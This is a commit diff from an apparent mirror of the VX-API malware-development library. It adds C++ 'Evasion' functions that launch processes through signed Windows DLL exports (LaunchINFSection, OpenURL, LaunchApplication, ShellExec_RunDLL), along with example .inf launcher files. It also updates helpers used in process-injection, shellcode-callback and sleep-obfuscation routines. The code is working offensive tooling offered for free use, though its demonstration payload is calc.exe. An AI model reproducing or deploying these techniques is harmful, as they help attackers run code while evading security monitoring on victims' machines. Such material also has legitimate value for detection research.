mirror of https://github.com/vxunderground/VX-API
parent
08fc458393
commit
0ee9d00a95
11
README.md
11
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.658
|
||||
Version: 2.0.684
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -103,6 +103,13 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| CopyFileViaSetupCopyFile | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSectionInstallStringNoCab | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSetupCommand | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSectionInstallStringNoCab2 | smelly__vx | Evasion |
|
||||
| CreateProcessFromIeFrameOpenUrl | smelly__vx | Evasion |
|
||||
| CreateProcessFromPcwUtil | smelly__vx | Evasion |
|
||||
| CreateProcessFromShdocVwOpenUrl | smelly__vx | Evasion |
|
||||
| CreateProcessFromShell32ShellExecRunDll | smelly__vx | Evasion |
|
||||
|
||||
| CreateProcessFromPcwUtil | smelly__vx | Evasion |
|
||||
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
|
||||
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
|
||||
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
|
||||
|
@ -150,6 +157,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| WriteDataToPeSection | smelly__vx | Helper Functions |
|
||||
| GetPeSectionSizeInByte | smelly__vx | Helper Functions |
|
||||
| ReadDataFromPeSection | smelly__vx | Helper Functions |
|
||||
| GetCurrentProcessNoForward | ReactOS | Helper Functions |
|
||||
| GetCurrentThreadNoForward | ReactOS | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
|
|
|
@ -0,0 +1,115 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
|
||||
Example .inf file
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
[version]
|
||||
signature = $Chicago$
|
||||
AdvancedInf = 2.5
|
||||
|
||||
[DefaultInstall_SingleUser]
|
||||
RunPostSetupCommands = Tag1
|
||||
|
||||
[Tag1]
|
||||
C:\Windows\system32\calc.exe
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
*/
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* LAUNCHINFSECTIONW)(HWND, HINSTANCE, PWSTR, INT);
|
||||
LAUNCHINFSECTIONW LaunchINFSectionW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WCHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"ieadvpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchINFSectionW = (LAUNCHINFSECTIONW)GetProcAddressA((DWORD64)hMod, "LaunchINFSectionW");
|
||||
if (!LaunchINFSectionW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyW(InfExecutionBuffer, PathToInfFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, NameOfSection) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L"1") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatW(InfExecutionBuffer, L",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(LaunchINFSectionW(NULL, NULL, InfExecutionBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
typedef HRESULT(WINAPI* LAUNCHINFSECTION)(HWND, HINSTANCE, PSTR, INT);
|
||||
LAUNCHINFSECTION LaunchINFSection = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"ieadvpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchINFSection = (LAUNCHINFSECTION)GetProcAddressA((DWORD64)hMod, "LaunchINFSection");
|
||||
if (!LaunchINFSection)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringCopyA(InfExecutionBuffer, PathToInfFile) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, NameOfSection) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, "1") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (StringConcatA(InfExecutionBuffer, ",") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(LaunchINFSection(NULL, NULL, InfExecutionBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,53 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
|
||||
Example .inf file
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
; ----------------------------------------------------------------------
|
||||
; Required Sections
|
||||
; ----------------------------------------------------------------------
|
||||
[Version]
|
||||
Signature=$CHICAGO$
|
||||
Provider=test
|
||||
Class=Printer
|
||||
|
||||
[Manufacturer]
|
||||
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
|
||||
|
||||
; ----------------------------------------------------------------------
|
||||
; Models Section
|
||||
; ----------------------------------------------------------------------
|
||||
[ModelsSection.NTx86]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[ModelsSection.NTia64]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[ModelsSection.NTamd64]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
; ----------------------------------------------------------------------
|
||||
; Support Sections
|
||||
; ----------------------------------------------------------------------
|
||||
[DefaultInstall]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[Squiblydoo]
|
||||
calc.exe
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
*/
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"ieframe.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, ccPathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"ieframe.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, PathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromPcwUtilW(LPCWSTR PathToBinary)
|
||||
{
|
||||
typedef VOID(WINAPI* LAUNCHAPPLICATIONW)(HWND, HINSTANCE, LPCWSTR);
|
||||
LAUNCHAPPLICATIONW LaunchApplicationW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"pcwutl.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchApplicationW = (LAUNCHAPPLICATIONW)GetProcAddressA((DWORD64)hMod, "LaunchApplicationW");
|
||||
if (!LaunchApplicationW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchApplicationW(NULL, NULL, PathToBinary);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromPcwUtilA(LPCSTR PathToBinary)
|
||||
{
|
||||
typedef VOID(WINAPI* LAUNCHAPPLICATIONW)(HWND, HINSTANCE, LPCWSTR);
|
||||
LAUNCHAPPLICATIONW LaunchApplicationW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WCHAR wBinaryPath[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(wBinaryPath, (PCHAR)PathToBinary, StringLengthA(PathToBinary)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"pcwutl.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchApplicationW = (LAUNCHAPPLICATIONW)GetProcAddressA((DWORD64)hMod, "LaunchApplicationW");
|
||||
if (!LaunchApplicationW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
LaunchApplicationW(NULL, NULL, wBinaryPath);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,58 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"shdocvw.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, ccPathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"shdocvw.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, PathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,50 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
|
||||
SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = TryLoadDllMultiMethodW((PWCHAR)L"shell32.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ShellExec_RunDllW = (SHELLEXEC_RUNDLLW)GetProcAddressA((DWORD64)hMod, "ShellExec_RunDLLW");
|
||||
if (!ShellExec_RunDllW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ShellExec_RunDllW(NULL, NULL, PathToFile, SW_SHOW);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = TryLoadDllMultiMethodW((PWCHAR)L"shell32.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ShellExec_RunDllA = (SHELLEXEC_RUNDLLA)GetProcAddressA((DWORD64)hMod, "ShellExec_RunDLLA");
|
||||
if (!ShellExec_RunDllA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ShellExec_RunDllA(NULL, NULL, PathToFile, SW_SHOW);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetCurrentProcessNoForward(VOID)
|
||||
{
|
||||
return (HANDLE)((HANDLE)-1);
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetCurrentThreadNoForward(VOID)
|
||||
{
|
||||
return ((HANDLE)(LONG_PTR)-2);
|
||||
}
|
|
@ -19,7 +19,7 @@ LPWSTR GetCurrentUserSidW(VOID)
|
|||
LPWSTR pSid = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
|
@ -84,7 +84,7 @@ LPSTR GetCurrentUserSidA(VOID)
|
|||
LPSTR pSid = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
|
|
|
@ -13,7 +13,7 @@ BOOL IsIntelHardwareBreakpointPresent(VOID)
|
|||
|
||||
Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
|
||||
|
||||
if (!GetThreadContext(InlineGetCurrentThread, Context))
|
||||
if (!GetThreadContext(GetCurrentThreadNoForward(), Context))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (Context->Dr0 || Context->Dr1 || Context->Dr2 || Context->Dr3)
|
||||
|
|
|
@ -7,7 +7,7 @@ BOOL IsProcessRunningAsAdmin(VOID)
|
|||
DWORD dwSize = 0;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_QUERY, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_QUERY, &hToken))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize))
|
||||
|
|
|
@ -9,7 +9,7 @@ INT main(VOID)
|
|||
|
||||
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
|
||||
|
||||
CreateProcessFromINFSectionInstallStringNoCabA("C:\\Users\\dwThr\\Desktop\\demo.inf", "DefaultInstall_SingleUser");
|
||||
CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
|
|
@ -29,7 +29,7 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
|
|||
if (!RtlEncodeRemotePointer)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
if (!K32GetModuleInformation(GetCurrentProcessNoForward(), hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
|
|
|
@ -4,12 +4,12 @@ VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
|
|||
{
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
if (!SymInitialize(GetCurrentProcessNoForward(), NULL, TRUE))
|
||||
return;
|
||||
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
||||
EnumDirTreeW(GetCurrentProcessNoForward(), L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
SymCleanup(GetCurrentProcessNoForward());
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
VOID InvokeEnumerateLoadedModules64CallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
|
||||
EnumerateLoadedModules64(GetCurrentProcessNoForward(), (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, FALSE))
|
||||
if (!SymInitializeW(GetCurrentProcessNoForward(), NULL, FALSE))
|
||||
return;
|
||||
|
||||
#pragma warning( push )
|
||||
|
@ -10,7 +10,7 @@ VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
|
|||
SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK)lpParameter, NULL);
|
||||
#pragma warning( pop )
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
SymCleanup(GetCurrentProcessNoForward());
|
||||
|
||||
}
|
||||
|
||||
|
|
|
@ -2,12 +2,12 @@
|
|||
|
||||
VOID InvokeSymEnumSourceFilesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, TRUE))
|
||||
if (!SymInitializeW(GetCurrentProcessNoForward(), NULL, TRUE))
|
||||
return;
|
||||
|
||||
SymEnumSourceFilesW(GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
|
||||
SymEnumSourceFilesW(GetCurrentProcessNoForward(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
SymCleanup(GetCurrentProcessNoForward());
|
||||
}
|
||||
|
||||
BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
|
|
|
@ -16,7 +16,7 @@ VOID InvokeVerifierEnumerateResourceCallbackRoutine(LPVOID lpParameter)
|
|||
if (!VerifierEnumerateResource)
|
||||
return;
|
||||
|
||||
VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
|
||||
VerifierEnumerateResource(GetCurrentProcessNoForward(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
|
||||
|
||||
return;
|
||||
}
|
||||
|
|
|
@ -18,7 +18,7 @@ HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
|
|||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2W(lpModuleName);
|
||||
}
|
||||
|
@ -41,7 +41,7 @@ HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
|
|||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2A(lpModuleName);
|
||||
}
|
|
@ -13,7 +13,7 @@ BOOL SetHardwareBreakpoint(_In_ DWORD ThreadId, _In_ PUINT_VAR_T Address, _In_ U
|
|||
goto EXIT_ROUTINE;
|
||||
}
|
||||
else
|
||||
hHandle = InlineGetCurrentThread;
|
||||
hHandle = GetCurrentThreadNoForward();
|
||||
|
||||
if (!GetThreadContext(hHandle, &Context))
|
||||
goto EXIT_ROUTINE;
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
BOOL SetProcessPrivilegeToken(_In_ DWORD PrivilegeEnum)
|
||||
{
|
||||
HANDLE Process = InlineGetCurrentProcess;
|
||||
HANDLE Process = GetCurrentProcessNoForward();
|
||||
HANDLE Token = INVALID_HANDLE_VALUE;
|
||||
TOKEN_PRIVILEGES Privileges = { 0 };
|
||||
DWORD TokenLength = 0;
|
||||
|
|
|
@ -97,7 +97,7 @@ BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In
|
|||
// WaitForSingleObject
|
||||
RopWaitForSingleObject.Rsp -= 8;
|
||||
RopWaitForSingleObject.Rip = (DWORD64)WaitForSingleObject;
|
||||
RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;
|
||||
RopWaitForSingleObject.Rcx = (DWORD64)GetCurrentProcessNoForward();
|
||||
RopWaitForSingleObject.Rdx = dwSleepTimeInMilliseconds;
|
||||
|
||||
// SystemFunction032
|
||||
|
|
|
@ -152,11 +152,17 @@
|
|||
<ClCompile Include="CreateMd5HashFromFilePath.cpp" />
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp" />
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
|
||||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
|
||||
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
|
||||
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
|
||||
<ClCompile Include="CreateProcessWithCfGuard.cpp" />
|
||||
|
@ -173,6 +179,8 @@
|
|||
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp" />
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp" />
|
||||
<ClCompile Include="GetPeSectionSizeInBytes.cpp" />
|
||||
<ClCompile Include="IsPeSection.cpp" />
|
||||
<ClCompile Include="LzMaximumCompressBuffer.cpp" />
|
||||
|
|
|
@ -771,6 +771,30 @@
|
|||
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentProcessNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentThreadNoForward.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
